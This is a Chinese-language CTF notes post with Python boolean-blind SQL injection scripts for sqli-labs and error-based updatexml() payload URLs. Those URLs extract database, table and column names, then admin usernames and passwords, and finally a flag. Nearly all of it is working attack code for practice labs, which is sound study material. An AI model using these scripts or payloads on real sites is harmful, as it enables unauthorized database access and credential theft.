一些常用的ctf中的sql注入的脚本和Payload,先记录在这里。
布尔盲注
sqlilab Less-8
用sqllib上的一个环境来学习一下怎么写脚本:
首先是爆破数据库名,附上脚本:
url_0 = "http://dd82d9c9-1380-43e2-afc9-cb70f7c3c368.node3.buuoj.cn/Less-5/?id="
mark = "You are in"
def get_database(url):
name = ''
for j in range(1, 10):
for i in range(48, 127):
payload = "1' and ascii(mid(database(), %d, 1))=%d--+"%(j, i)
url = url_0+payload
#print(url)
r = requests.get(url)
url = url_0
if mark in r.text:
name = name+chr(i)
print(name)
break
print("database_name:"+name)
get_database(url_0)
然后是表名:
def get_tables(url_0):
list = []
name = ''
for k in range(0, 4):
for j in range(1, 10):
for i in range(48, 127):
payload = "1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit %d, 1), %d, 1))=%d--+"%(k, j, i)
url = url_0+payload
#print(url)
r = requests.get(url)
url = url_0
if mark in r.text:
name = name+chr(i)
print(name)
break
list.append(name)
name = ''
print('table_name:',list)
get_tables(url_0)
然后整个字段,原理和爆table差不多的:
def get_column(url_0):
list = []
name = ''
for k in range(0, 4):
for j in range(1, 10):
for i in range(48, 127):
payload = "1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit %d, 1), %d, 1))=%d--+"%(k, j, i)
url = url_0+payload
#print(url)
r = requests.get(url)
url = url_0
if mark in r.text:
name = name+chr(i)
print(name)
break
list.append(name)
name = ''
print('column_name:',list)
get_column(url_0)
这个ip是认真的吗?好吧,幸好不重要,不然我懵逼了。。接下来爆字段,代码都一样了。。
报错注入
updatexml()
payload附上
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
爆库
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆表
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1
爆字段
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段内容
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
上次遇到一道题显示不出来还用了mid函数把后32位表示出来,然后把右边和左边拼凑出来
?id=1 and (updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1));